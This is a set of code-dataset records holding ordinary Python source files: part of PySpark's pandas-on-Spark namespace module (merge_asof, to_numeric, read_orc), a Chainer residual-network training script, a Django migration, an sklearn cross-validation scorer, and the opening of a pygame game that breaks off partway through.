],\n ... \"bid\": [720.50, 51.95, 51.97, 51.99, 720.50, 97.99, 720.50, 52.01],\n ... \"ask\": [720.93, 51.96, 51.98, 52.00, 720.93, 98.01, 720.88, 52.03]\n ... }\n ... )\n >>> quotes\n time ticker bid ask\n 0 2016-05-25 13:30:00.023 GOOG 720.50 720.93\n 1 2016-05-25 13:30:00.023 MSFT 51.95 51.96\n 2 2016-05-25 13:30:00.030 MSFT 51.97 51.98\n 3 2016-05-25 13:30:00.041 MSFT 51.99 52.00\n 4 2016-05-25 13:30:00.048 GOOG 720.50 720.93\n 5 2016-05-25 13:30:00.049 AAPL 97.99 98.01\n 6 2016-05-25 13:30:00.072 GOOG 720.50 720.88\n 7 2016-05-25 13:30:00.075 MSFT 52.01 52.03\n\n >>> trades = ps.DataFrame(\n ... {\n ... \"time\": [\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.038\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\")\n ... ],\n ... \"ticker\": [\"MSFT\", \"MSFT\", \"GOOG\", \"GOOG\", \"AAPL\"],\n ... \"price\": [51.95, 51.95, 720.77, 720.92, 98.0],\n ... \"quantity\": [75, 155, 100, 100, 100]\n ... }\n ... )\n >>> trades\n time ticker price quantity\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155\n 2 2016-05-25 13:30:00.048 GOOG 720.77 100\n 3 2016-05-25 13:30:00.048 GOOG 720.92 100\n 4 2016-05-25 13:30:00.048 AAPL 98.00 100\n\n By default we are taking the asof of the quotes\n\n >>> ps.merge_asof(\n ... trades, quotes, on=\"time\", by=\"ticker\"\n ... ).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 51.95 51.96\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 51.97 51.98\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 720.50 720.93\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 720.50 720.93\n\n We only asof within 2ms between the quote time and the trade time\n\n >>> ps.merge_asof(\n ... trades,\n ... quotes,\n ... on=\"time\",\n ... by=\"ticker\",\n ... tolerance=sf.expr(\"INTERVAL 2 MILLISECONDS\") # pd.Timedelta(\"2ms\")\n ... ).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 51.95 51.96\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 NaN NaN\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 720.50 720.93\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 720.50 720.93\n\n We only asof within 10ms between the quote time and the trade time\n and we exclude exact matches on time. However *prior* data will\n propagate forward\n\n >>> ps.merge_asof(\n ... trades,\n ... quotes,\n ... on=\"time\",\n ... by=\"ticker\",\n ... tolerance=sf.expr(\"INTERVAL 10 MILLISECONDS\"), # pd.Timedelta(\"10ms\")\n ... allow_exact_matches=False\n ... 
).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 NaN NaN\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 51.97 51.98\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 NaN NaN\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 NaN NaN\n \"\"\"\n\n def to_list(os: Optional[Union[Name, List[Name]]]) -> List[Label]:\n if os is None:\n return []\n elif is_name_like_tuple(os):\n return [cast(Label, os)]\n elif is_name_like_value(os):\n return [(os,)]\n else:\n return [o if is_name_like_tuple(o) else (o,) for o in os]\n\n if isinstance(left, Series):\n left = left.to_frame()\n if isinstance(right, Series):\n right = right.to_frame()\n\n if on:\n if left_on or right_on:\n raise ValueError(\n 'Can only pass argument \"on\" OR \"left_on\" and \"right_on\", '\n \"not a combination of both.\"\n )\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(on)))\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(on)))\n else:\n if left_index:\n if isinstance(left.index, MultiIndex):\n raise ValueError(\"left can only have one index\")\n left_as_of_names = left._internal.index_spark_column_names\n else:\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(left_on)))\n if right_index:\n if isinstance(right.index, MultiIndex):\n raise ValueError(\"right can only have one index\")\n right_as_of_names = right._internal.index_spark_column_names\n else:\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(right_on)))\n\n if left_as_of_names and not right_as_of_names:\n raise ValueError(\"Must pass right_on or right_index=True\")\n if right_as_of_names and not left_as_of_names:\n raise ValueError(\"Must pass left_on or left_index=True\")\n if not left_as_of_names and not right_as_of_names:\n common = list(left.columns.intersection(right.columns))\n if len(common) == 0:\n raise ValueError(\n \"No common columns to perform merge on. 
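The validation above resolves exactly one as-of key per side, taken from `on`, from `left_on`/`right_on`, from the index, or, failing all of those, from the columns common to both frames. A minimal sketch of combinations that pass and fail, reusing the `left`/`right` frames from the examples:

import pyspark.pandas as ps

left = ps.DataFrame({"a": [1, 5, 10], "left_val": ["a", "b", "c"]})
right = ps.DataFrame({"a": [1, 2, 3], "right_val": [1, 2, 3]})

ps.merge_asof(left, right, on="a")  # ok: one key per side
# ps.merge_asof(left, right, on="a", left_on="a")  # ValueError: "on" OR left_on/right_on
# ps.merge_asof(left, right)  # no keys given: falls back to the common column 'a'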
Merge options: \"\n \"left_on=None, right_on=None, left_index=False, right_index=False\"\n )\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(common)))\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(common)))\n\n if len(left_as_of_names) != 1:\n raise ValueError(\"can only asof on a key for left\")\n if len(right_as_of_names) != 1:\n raise ValueError(\"can only asof on a key for right\")\n\n if by:\n if left_by or right_by:\n raise ValueError('Can only pass argument \"by\" OR \"left_by\" and \"right_by\".')\n left_join_on_names = list(map(left._internal.spark_column_name_for, to_list(by)))\n right_join_on_names = list(map(right._internal.spark_column_name_for, to_list(by)))\n else:\n left_join_on_names = list(map(left._internal.spark_column_name_for, to_list(left_by)))\n right_join_on_names = list(map(right._internal.spark_column_name_for, to_list(right_by)))\n\n if left_join_on_names and not right_join_on_names:\n raise ValueError(\"missing right_by\")\n if right_join_on_names and not left_join_on_names:\n raise ValueError(\"missing left_by\")\n if len(left_join_on_names) != len(right_join_on_names):\n raise ValueError(\"left_by and right_by must be same length\")\n\n # We should distinguish the name to avoid ambiguous column name after merging.\n right_prefix = \"__right_\"\n right_as_of_names = [right_prefix + right_as_of_name for right_as_of_name in right_as_of_names]\n right_join_on_names = [\n right_prefix + right_join_on_name for right_join_on_name in right_join_on_names\n ]\n\n left_as_of_name = left_as_of_names[0]\n right_as_of_name = right_as_of_names[0]\n\n def resolve(internal: InternalFrame, side: str) -> InternalFrame:\n def rename(col: str) -> str:\n return \"__{}_{}\".format(side, col)\n\n internal = internal.resolved_copy\n sdf = internal.spark_frame\n sdf = sdf.select(\n *[\n scol_for(sdf, col).alias(rename(col))\n for col in sdf.columns\n if col not in HIDDEN_COLUMNS\n ],\n *HIDDEN_COLUMNS,\n )\n return internal.copy(\n spark_frame=sdf,\n index_spark_columns=[\n scol_for(sdf, rename(col)) for col in internal.index_spark_column_names\n ],\n index_fields=[field.copy(name=rename(field.name)) for field in internal.index_fields],\n data_spark_columns=[\n scol_for(sdf, rename(col)) for col in internal.data_spark_column_names\n ],\n data_fields=[field.copy(name=rename(field.name)) for field in internal.data_fields],\n )\n\n left_internal = left._internal.resolved_copy\n right_internal = resolve(right._internal, \"right\")\n\n left_table = left_internal.spark_frame.alias(\"left_table\")\n right_table = right_internal.spark_frame.alias(\"right_table\")\n\n left_as_of_column = scol_for(left_table, left_as_of_name)\n right_as_of_column = scol_for(right_table, right_as_of_name)\n\n if left_join_on_names:\n left_join_on_columns = [scol_for(left_table, label) for label in left_join_on_names]\n right_join_on_columns = [scol_for(right_table, label) for label in right_join_on_names]\n on = reduce(\n lambda lft, rgt: lft & rgt,\n [lft == rgt for lft, rgt in zip(left_join_on_columns, right_join_on_columns)],\n )\n else:\n on = None\n\n Column = get_column_class()\n if tolerance is not None and not isinstance(tolerance, Column):\n tolerance = F.lit(tolerance)\n\n as_of_joined_table = left_table._joinAsOf(\n right_table,\n leftAsOfColumn=left_as_of_column,\n rightAsOfColumn=right_as_of_column,\n on=on,\n how=\"left\",\n tolerance=tolerance,\n allowExactMatches=allow_exact_matches,\n direction=direction,\n )\n\n # Unpack suffixes tuple 
for convenience\n left_suffix = suffixes[0]\n right_suffix = suffixes[1]\n\n # Append suffixes to columns with the same name to avoid conflicts later\n duplicate_columns = set(left_internal.column_labels) & set(right_internal.column_labels)\n\n exprs = []\n data_columns = []\n column_labels = []\n\n def left_scol_for(label: Label) -> Column: # type: ignore[valid-type]\n return scol_for(as_of_joined_table, left_internal.spark_column_name_for(label))\n\n def right_scol_for(label: Label) -> Column: # type: ignore[valid-type]\n return scol_for(as_of_joined_table, right_internal.spark_column_name_for(label))\n\n for label in left_internal.column_labels:\n col = left_internal.spark_column_name_for(label)\n scol = left_scol_for(label)\n if label in duplicate_columns:\n spark_column_name = left_internal.spark_column_name_for(label)\n if spark_column_name in (left_as_of_names + left_join_on_names) and (\n (right_prefix + spark_column_name) in (right_as_of_names + right_join_on_names)\n ):\n pass\n else:\n col = col + left_suffix\n scol = scol.alias(col) # type: ignore[attr-defined]\n label = tuple([str(label[0]) + left_suffix] + list(label[1:]))\n exprs.append(scol)\n data_columns.append(col)\n column_labels.append(label)\n for label in right_internal.column_labels:\n # recover `right_prefix` here.\n col = right_internal.spark_column_name_for(label)[len(right_prefix) :]\n scol = right_scol_for(label).alias(col) # type: ignore[attr-defined]\n if label in duplicate_columns:\n spark_column_name = left_internal.spark_column_name_for(label)\n if spark_column_name in left_as_of_names + left_join_on_names and (\n (right_prefix + spark_column_name) in right_as_of_names + right_join_on_names\n ):\n continue\n else:\n col = col + right_suffix\n scol = scol.alias(col) # type: ignore[attr-defined]\n label = tuple([str(label[0]) + right_suffix] + list(label[1:]))\n exprs.append(scol)\n data_columns.append(col)\n column_labels.append(label)\n\n # Retain indices if they are used for joining\n if left_index or right_index:\n index_spark_column_names = [\n SPARK_INDEX_NAME_FORMAT(i) for i in range(len(left_internal.index_spark_column_names))\n ]\n left_index_scols = [\n scol.alias(name)\n for scol, name in zip(left_internal.index_spark_columns, index_spark_column_names)\n ]\n exprs.extend(left_index_scols)\n index_names = left_internal.index_names\n else:\n index_spark_column_names = []\n index_names = []\n\n selected_columns = as_of_joined_table.select(*exprs)\n\n internal = InternalFrame(\n spark_frame=selected_columns,\n index_spark_columns=[scol_for(selected_columns, col) for col in index_spark_column_names],\n index_names=index_names,\n column_labels=column_labels,\n data_spark_columns=[scol_for(selected_columns, col) for col in data_columns],\n )\n return DataFrame(internal)\n\n\n@no_type_check\ndef to_numeric(arg, errors=\"raise\"):\n \"\"\"\n Convert argument to a numeric type.\n\n Parameters\n ----------\n arg : scalar, list, tuple, 1-d array, or Series\n Argument to be converted.\n errors : {'raise', 'coerce'}, default 'raise'\n * If 'coerce', then invalid parsing will be set as NaN.\n * If 'raise', then invalid parsing will raise an exception.\n * If 'ignore', then invalid parsing will return the input.\n\n .. 
note:: 'ignore' doesn't work yet when `arg` is pandas-on-Spark Series.\n\n Returns\n -------\n ret : numeric if parsing succeeded.\n\n See Also\n --------\n DataFrame.astype : Cast argument to a specified dtype.\n to_datetime : Convert argument to datetime.\n to_timedelta : Convert argument to timedelta.\n numpy.ndarray.astype : Cast a numpy array to a specified type.\n\n Examples\n --------\n\n >>> psser = ps.Series(['1.0', '2', '-3'])\n >>> psser\n 0 1.0\n 1 2\n 2 -3\n dtype: object\n\n >>> ps.to_numeric(psser)\n 0 1.0\n 1 2.0\n 2 -3.0\n dtype: float32\n\n If given Series contains invalid value to cast float, just cast it to `np.nan`\n when `errors` is set to \"coerce\".\n\n >>> psser = ps.Series(['apple', '1.0', '2', '-3'])\n >>> psser\n 0 apple\n 1 1.0\n 2 2\n 3 -3\n dtype: object\n\n >>> ps.to_numeric(psser, errors=\"coerce\")\n 0 NaN\n 1 1.0\n 2 2.0\n 3 -3.0\n dtype: float32\n\n Also support for list, tuple, np.array, or a scalar\n\n >>> ps.to_numeric(['1.0', '2', '-3'])\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric(('1.0', '2', '-3'))\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric(np.array(['1.0', '2', '-3']))\n array([ 1., 2., -3.])\n\n >>> ps.to_numeric('1.0')\n 1.0\n \"\"\"\n if isinstance(arg, Series):\n if errors == \"coerce\":\n return arg._with_new_scol(arg.spark.column.cast(\"float\"))\n elif errors == \"raise\":\n scol = arg.spark.column\n scol_casted = scol.cast(\"float\")\n cond = F.when(\n F.assert_true(scol.isNull() | scol_casted.isNotNull()).isNull(), scol_casted\n )\n return arg._with_new_scol(cond)\n elif errors == \"ignore\":\n raise NotImplementedError(\"'ignore' is not implemented yet, when the `arg` is Series.\")\n else:\n raise ValueError(\"invalid error value specified\")\n else:\n return pd.to_numeric(arg, errors=errors)\n\n\ndef broadcast(obj: DataFrame) -> DataFrame:\n \"\"\"\n Marks a DataFrame as small enough for use in broadcast joins.\n\n .. deprecated:: 3.2.0\n Use :func:`DataFrame.spark.hint` instead.\n\n Parameters\n ----------\n obj : DataFrame\n\n Returns\n -------\n ret : DataFrame with broadcast hint.\n\n See Also\n --------\n DataFrame.merge : Merge DataFrame objects with a database-style join.\n DataFrame.join : Join columns of another DataFrame.\n DataFrame.update : Modify in place using non-NA values from another DataFrame.\n DataFrame.hint : Specifies some hint on the current DataFrame.\n\n Examples\n --------\n >>> df1 = ps.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [1, 2, 3, 5]},\n ... columns=['lkey', 'value']).set_index('lkey')\n >>> df2 = ps.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [5, 6, 7, 8]},\n ... columns=['rkey', 'value']).set_index('rkey')\n >>> merged = df1.merge(ps.broadcast(df2), left_index=True, right_index=True)\n >>> merged.spark.explain() # doctest: +ELLIPSIS\n == Physical Plan ==\n ...\n ...BroadcastHashJoin...\n ...\n \"\"\"\n warnings.warn(\n \"`broadcast` has been deprecated and might be removed in a future version. 
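Note that for Series input the `to_numeric` implementation above casts to Spark's 32-bit `float`, which is why the doctests show `dtype: float32` rather than pandas' float64, and errors="raise" is emulated with `F.assert_true` over the cast result. A short sketch:

import pyspark.pandas as ps

psser = ps.Series(["apple", "1.0", "2"])
ps.to_numeric(psser, errors="coerce")  # 'apple' -> NaN via the plain float cast
# ps.to_numeric(psser)                 # errors="raise": assert_true fails on 'apple'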
\"\n \"Use `DataFrame.spark.hint` with 'broadcast' for `name` parameter instead.\",\n FutureWarning,\n )\n if not isinstance(obj, DataFrame):\n raise TypeError(\"Invalid type : expected DataFrame got {}\".format(type(obj).__name__))\n return DataFrame(\n obj._internal.with_new_sdf(F.broadcast(obj._internal.resolved_copy.spark_frame))\n )\n\n\ndef read_orc(\n path: str,\n columns: Optional[List[str]] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> \"DataFrame\":\n \"\"\"\n Load an ORC object from the file path, returning a DataFrame.\n\n Parameters\n ----------\n path : str\n The path string storing the ORC file to be read.\n columns : list, default None\n If not None, only these columns will be read from the file.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame\n\n Examples\n --------\n >>> ps.range(1).to_orc('%s/read_spark_io/data.orc' % path)\n >>> ps.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'])\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(1).to_orc('%s/read_spark_io/data.orc' % path, index_col=\"index\")\n >>> ps.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'], index_col=\"index\")\n ... # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 0\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n psdf = read_spark_io(path, format=\"orc\", index_col=index_col, **options)\n\n if columns is not None:\n psdf_columns = psdf.columns\n new_columns = list()\n for column in list(columns):\n if column in psdf_columns:\n new_columns.append(column)\n else:\n raise ValueError(\"Unknown column name '{}'\".format(column))\n psdf = psdf[new_columns]\n\n return psdf\n\n\ndef _get_index_map(\n sdf: PySparkDataFrame, index_col: Optional[Union[str, List[str]]] = None\n) -> Tuple[Optional[List[PySparkColumn]], Optional[List[Label]]]:\n index_spark_columns: Optional[List[PySparkColumn]]\n index_names: Optional[List[Label]]\n if index_col is not None:\n if isinstance(index_col, str):\n index_col = [index_col]\n sdf_columns = set(sdf.columns)\n for col in index_col:\n if col not in sdf_columns:\n raise KeyError(col)\n index_spark_columns = [scol_for(sdf, col) for col in index_col]\n index_names = [(col,) for col in index_col]\n else:\n index_spark_columns = None\n index_names = None\n\n return index_spark_columns, index_names\n\n\n_get_dummies_default_accept_types = (DecimalType, StringType, DateType)\n_get_dummies_acceptable_types = _get_dummies_default_accept_types + (\n ByteType,\n ShortType,\n IntegerType,\n LongType,\n FloatType,\n DoubleType,\n BooleanType,\n TimestampType,\n TimestampNTZType,\n)\n\n\ndef _test() -> None:\n import os\n import doctest\n import shutil\n import sys\n import tempfile\n import uuid\n from pyspark.sql import SparkSession\n import pyspark.pandas.namespace\n\n os.chdir(os.environ[\"SPARK_HOME\"])\n\n globs = pyspark.pandas.namespace.__dict__.copy()\n globs[\"ps\"] = pyspark.pandas\n globs[\"sf\"] = F\n spark = (\n SparkSession.builder.master(\"local[4]\")\n .appName(\"pyspark.pandas.namespace tests\")\n .getOrCreate()\n )\n\n db_name = \"db%s\" % str(uuid.uuid4()).replace(\"-\", \"\")\n spark.sql(\"CREATE DATABASE %s\" % db_name)\n globs[\"db\"] = db_name\n\n path = tempfile.mkdtemp()\n globs[\"path\"] = path\n\n (failure_count, 
test_count) = doctest.testmod(\n pyspark.pandas.namespace,\n globs=globs,\n optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,\n )\n\n shutil.rmtree(path, ignore_errors=True)\n spark.sql(\"DROP DATABASE IF EXISTS %s CASCADE\" % db_name)\n spark.stop()\n if failure_count:\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n _test()\n","sub_path":"python/pyspark/pandas/namespace.py","file_name":"namespace.py","file_ext":"py","file_size_in_byte":133058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"58826137","text":"# coding: utf-8\n#chainer\n\nimport os\nimport sys\nimport chainer\nimport chainer.initializers as I\nimport chainer.functions as F\nimport chainer.links as L\nfrom Core import Trainer\nfrom Chains import classifier as C\nfrom Chains import chain\nfrom Chains import util as U\n\n'''\nSingleReLU dropout 1\nlayer 10\n32-32x2-64x2-128x2-256x2-11\nconv 1 + 2 x 4\nfully 1\nmax pooling\nReLU\n650\n'''\nclass Block(chainer.Chain):\n def __init__(self, initializer, inch, outch, util):\n self.inch = inch\n self.outch = outch\n super(Block, self).__init__()\n with self.init_scope():\n self.conv1 = L.Convolution2D(inch,outch, ksize=3, stride=1, pad=1, initialW=initializer)\n util.add(self.conv1)\n self.conv2 = L.Convolution2D(outch,outch, ksize=3, stride=1, pad=1, initialW=initializer)\n util.add(self.conv2)\n self.bnorm1 = L.BatchNormalization(inch)\n self.bnorm2 = L.BatchNormalization(outch)\n self.bnorm3 = L.BatchNormalization(outch)\n\n def __call__(self, x, test=False):\n h0 = self.bnorm1(x, finetune=test)\n h1 = F.relu(self.bnorm2(self.conv1(h0), finetune=test))\n h1 = F.dropout(h1,0.2)\n h2 = self.bnorm3(self.conv2(h1), finetune=test)\n pad_x = F.concat((x, U.zero_pad(x, self.inch, self.outch)))\n h3 = h2+pad_x\n\n return h3\n\nclass ResidualNN(C.Classifier):\n layer_num = [32,32,64,128,256]\n def __init__(self,initializer, layer_num=layer_num):\n super().__init__(chain.Res4Chain2(initializer,Block, layer_num, initialBN=True))\n\nexport_dir = os.path.join(os.getcwd(),\"save\")\nfilename, ext= os.path.splitext(__file__)\ndataset_dir = os.path.join(os.getcwd(),\"../dataset\")\n\ntrain = Trainer(filename, export_dir, dataset_dir)\ntrain.set_networks(ResidualNN, I.HeNormal)\n\ntrain.model_init()\nlr_update = [[0,200,350,500],[0.3,0.1,0.01,0.001]]\n\ntrain.train_loop(lr_update=lr_update)\n\ntrain.testing()\n\ntrain.export()\n","sub_path":"train/experiment_ResSinDro3.py","file_name":"experiment_ResSinDro3.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116251115","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('workflow', '0002_auto_20140717_0224'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserColumnDataMapping',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, 
blank=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.CharField(max_length=250)),\n ('data_type', models.CharField(max_length=2, choices=[(b'ca', b'Category'), (b'ft', b'Full Text'), (b'da', b'Date'), (b'fl', b'Decimal Number')])),\n ('created_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkflowDataMappingRevisionColumnLink',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('user_column_data_mapping', models.ForeignKey(to='workflow.UserColumnDataMapping')),\n ('workflow_data_column_revision', models.ForeignKey(to='workflow.WorkflowDataColumnsRevision')),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"chembiocrunch/workflow/migrations/0003_usercolumndatamapping_workflowdatamappingrevisioncolumnlink.py","file_name":"0003_usercolumndatamapping_workflowdatamappingrevisioncolumnlink.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632424771","text":"# All scorer.py files must contain the function score(), which takes as input the following items: an instance of one of\n# the models of a modelclass.py file, a feature set, the corresponding correct labels of the feature set, and the set of\n# \"hyperparameters\" of the scoring function. It then returns a dictionary containing the model's scores for various\n# performance metrics e.g. 
accuracy, precision, recall, etc.\n# It must also include the function scorer_name(), returning the name of the scoring method used.\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.metrics import accuracy_score, confusion_matrix, f1_score, precision_score, recall_score\nimport numpy as np\n\n\n# NOTES ABOUT THIS PARTICULAR SCORER\n# This scorer uses stratified N-fold cross validation and returns the averaged performance metrics of all N folds\ndef score(model, feature_set, labels, N=3, shuffle=False, calc_acc=True, calc_prc=True, calc_rec=True, calc_f1=True, calc_cm=True):\n assert len(labels) >= N\n skf = StratifiedKFold(labels, n_folds=N, shuffle=shuffle)\n accuracy = []\n precision = []\n recall = []\n f1 = []\n confusion_matrices = []\n for train, test in skf:\n X_train, X_test, y_train, y_test = feature_set[train], feature_set[test], labels[train], labels[test]\n model.fit(X_train, y_train)\n prediction = model.predict(X_test)\n if calc_acc:\n accuracy.append(accuracy_score(y_test, prediction))\n if calc_prc:\n precision.append(precision_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_rec:\n recall.append(recall_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_f1:\n f1.append(f1_score(y_test, prediction, pos_label=None, average='weighted'))\n if calc_cm:\n confusion_matrices.append(confusion_matrix(y_test, prediction))\n metrics = {}\n if calc_acc:\n metrics[\"accuracy\"] = np.mean(accuracy)\n if calc_prc:\n metrics[\"precision\"] = np.mean(precision)\n if calc_rec:\n metrics[\"recall\"] = np.mean(recall)\n if calc_f1:\n metrics[\"f1\"] = np.mean(f1)\n if calc_cm:\n metrics[\"confusion_matrix\"] = confusion_matrices[0]\n for matrix in confusion_matrices[1:]:\n metrics[\"confusion_matrix\"] += matrix\n return metrics\n\n\ndef scorer_name():\n return \"Stratified N-fold Cross Validation\"\n","sub_path":"src/enScorers/StratifiedNFoldCV/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621936540","text":"import math\nimport random\nimport time\nimport pygame\nimport sys\nfrom pygame.locals import *\n\nSCREENWIDTH = 720\nSCREENHEIGHT = int(0.75*(SCREENWIDTH))\n\nTVSCREENWIDTH = SCREENWIDTH + 100\nTVSCREENHEIGHT = SCREENHEIGHT + 100\n\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nGREY = (180,180,180)\nDARKGREY =(100,100,100)\nDARKERGREY = (50,50,50)\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\n\nPLAYERWIDTH = 80\nPLAYERHEIGHT = 90\nHITBOXWIDTH = 70\nHITBOXHEIGHT = PLAYERHEIGHT\n\nGLITCHWIDTH = PLAYERWIDTH\nGLITCHHEIGHT = PLAYERHEIGHT/2\nGLITCHTIME = 1 #seconds\n\nENEMYWIDTH = 60\nENEMYHEIGHT = 50\nENEMYSPEED = 5\n\nLANE = 6 #1st lane is for display reason\n\nFPS = 30\n\n#pygame.display.set_icon(pygame.image.load(\"\"))\npygame.init()\n\nDisplay = pygame.display.set_mode((TVSCREENWIDTH, TVSCREENHEIGHT))\npygame.display.set_caption(\"Glitchman TV\")\n\n#pygame.mouse.set_cursor(*pygame.cursors.tri_left)\n\nTheFont = pygame.font.Font(\"./font/ZCOOL_QingKe_HuangYou/ZCOOLQingKeHuangYou-Regular.ttf\",30)\n\nENEMYGLITCH = pygame.transform.scale(pygame.image.load(\"./sprite/enemy_glitch.png\"),(ENEMYWIDTH,ENEMYHEIGHT))\nPLAYERGLITCH = pygame.transform.scale(pygame.image.load(\"./sprite/player_glitch.png\"),(int(GLITCHWIDTH),int(GLITCHHEIGHT)))\n\nWALK1 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk1new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK2 = 
pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk2new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK3 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk3new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK4 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk4new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK5 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk5new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK6 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk6new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK7 = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk7new.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\n\nWALK1BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk1new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK2BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk2new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK3BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk3new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK4BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk4new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK5BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk5new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK6BW = pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk6new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\nWALK7BW = 